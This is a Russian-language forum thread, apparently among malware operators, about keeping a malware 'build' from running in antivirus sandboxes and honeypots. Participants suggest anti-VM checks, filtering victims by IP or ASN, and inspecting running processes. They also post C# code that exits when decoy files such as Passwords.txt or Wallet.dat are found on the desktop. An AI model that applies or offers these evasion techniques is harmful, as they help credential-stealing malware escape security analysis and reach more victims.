Пожалуйста, обратите внимание, что пользователь заблокирован
del
Последнее редактирование:
Не всегда это будут виртуальные машины, либо они могут быть настроенными таким образом, чтобы скрыть, что они виртуальные. Я думаю, что, если знаешь свои цели, то можно их отсеить по белому списку (ip-адреса или их диапазон, имена пользователей, имена компьютеров, наличие какого-то специфического софта и тд).антивм сделай, чтобы твой билд не работал у аверов
АнтиВМ не всегда работает согласен.Не всегда это будут виртуальные машины, либо они могут быть настроенными таким образом, чтобы скрыть, что они виртуальные. Я думаю, что, если знаешь свои цели, то можно их отсеить по белому списку (ip-адреса или их диапазон, имена пользователей, имена компьютеров, наличие какого-то специфического софта и тд).
if (File.Exists(HelpStatic.desktop + "\\Passwords.txt"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\Password.txt"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\db.sql"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\Wallet.dat"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\qualityroot.rtf"))
{
Environment.Exit(0);
}
if (File.Exists(HelpStatic.desktop + "\\lightagainst.rtf"))
{
Environment.Exit(0);
}
А это хрень. Пытался я блочить IP, там диапазонов не меренно.Попробуй узнать какому ASN принадлежат айпишники этих ботов. А дальше можешь попробовать заблочить весь рендж адресов которые входят в эту ASN.
Держать на рабочем столе wallet.dat - это конечно забавно. Плюс можно посмотреть, например, запущенные процессы, часто бывает, что в ханипотах или сендбоксах запущено с десяток разных браузеров, какие то мессенджеры разные, клиенты для криптовалют и тд.Эти файлы почти всегда лежат на раб. столе аверов. В здравом уме такое не кто так не хранит.